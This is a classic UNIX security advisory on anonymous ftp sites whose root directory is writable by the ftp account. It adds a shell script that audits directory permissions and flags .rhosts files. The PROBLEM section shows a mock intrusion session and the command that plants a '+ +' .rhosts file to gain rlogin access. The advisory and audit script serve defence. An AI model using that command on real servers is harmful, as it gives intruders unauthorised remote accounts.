COMMAND
ftp
SYSTEMS AFFECTED
Any UNIX machine with an improperly configured ftp site
(permissions).
PROBLEM
A remote user can create a login account on your machine if the
root directory on your ftp site is world writable, or writable by
ftp. Someone can just log in as follows:
evil/~> ftp target.victim.com
Connected to 666.666.666.666.
220 target FTP server (Version wu-1.2(1) Mon Feb 30 18:04:42 EST 1995) ready.
Name (666.666.666.666:hakd00d): ftp (or anonymous)
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230-Welcome to Victim Internet Services, Inc.
230-
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 7704
drwxrwxrwx 40 ftp other 8192 Jun 10 19:11 .
drwxr-xr-x 40 root other 8192 Jun 10 19:11 ..
lrwxrwxrwx 1 ftp other 8 May 24 12:19 1869 -> pub/1869
drwxrwxrwx 4 root root 4096 May 23 02:05 pix.tar.gz
lrwxrwxrwx 1 ftp other 8 May 24 12:19 idiot -> pub/idiot
We see that the current directory (.) is world writable AND owned
by ftp. I could now just do something like:
echo "+ +" > .rhosts
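Because the ftp root is normally the home directory of the ftp
account, rlogin and rsh will honor this file, and "+ +" tells them
to trust any user from any host. This gives an intruder an account
on your machine, and allows him to try to gain root locally, or use
your machine as a jumping-off point to other machines.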
SOLUTION
Directories in the ftp site should NOT be owned by ftp. ALL
directories except "incoming" should be mode 755 (chmod 755 *).
The "incoming" directory should be mode 733 (chmod 733 incoming).
Files, by the way, should probably be 744. Also chroot the ftp
directory before allowing access, so that if an intruder does get
an account, it will be difficult for them to access anything
further back in the tree (towards root).
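
An added example, not part of the original advisory: a POSIX shell
function that audits an anonymous ftp tree against the permissions in
the SOLUTION above and flags any .rhosts file. The name audit_ftp_tree,
its finding labels, and the assumption that "incoming" sits directly
under the ftp root are choices made here.

```shell
#!/bin/sh
# Added example: audit an anonymous-ftp tree against the advisory's SOLUTION.
# audit_ftp_tree and the finding labels are hypothetical names.
# Usage: audit_ftp_tree ROOT [FTP_USER]   (FTP_USER: name or uid, default "ftp")
# Assumes "incoming" is ROOT/incoming. Prints one "LABEL path" line per
# finding; returns 0 if the tree is clean, 1 if anything was flagged.
audit_ftp_tree() {
    root=${1%/}
    ftp_user=${2:-ftp}
    findings=$(
        # No directory in the tree should be owned by the ftp account.
        find "$root" -type d -user "$ftp_user" |
            sed 's/^/DIR_OWNED_BY_FTP /'
        # Every directory except incoming should be exactly 755.
        find "$root" -type d ! -path "$root/incoming" ! -perm 755 |
            sed 's/^/DIR_NOT_755 /'
        # incoming should be exactly 733 (write and search, no listing).
        find "$root" -path "$root/incoming" -type d ! -perm 733 |
            sed 's/^/INCOMING_NOT_733 /'
        # Files at 744 are not group- or world-writable; flag any that are.
        find "$root" -type f \( -perm -020 -o -perm -002 \) |
            sed 's/^/FILE_WRITABLE /'
        # A .rhosts anywhere in the tree is the file the PROBLEM section plants.
        find "$root" -name .rhosts | sed 's/^/RHOSTS_PRESENT /'
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Run as a script: sh audit.sh /path/to/ftp/root [ftp_user]
[ "$#" -eq 0 ] || audit_ftp_tree "$@"
```

Run it as root so that find can descend into "incoming", which mode 733
makes unreadable to other users.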